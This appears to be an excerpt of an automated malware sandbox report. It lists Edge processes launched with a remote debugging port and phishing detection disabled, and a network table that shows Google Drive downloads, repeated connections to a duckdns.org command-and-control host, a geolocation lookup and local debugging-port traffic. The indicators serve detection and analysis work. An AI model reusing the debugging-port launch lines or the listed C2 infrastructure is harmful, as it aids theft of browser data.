C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 172.217.16.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | dvlqrd8dhs.duckdns.org | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 154.216.20.245:46063 | dvlqrd8dhs.duckdns.org | tcp |
| US | 8.8.8.8:53 | 245.20.216.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.212.202:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 216.58.212.202:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 127.0.0.1:9222 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| N/A | 127.0.0.1:9222 | | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files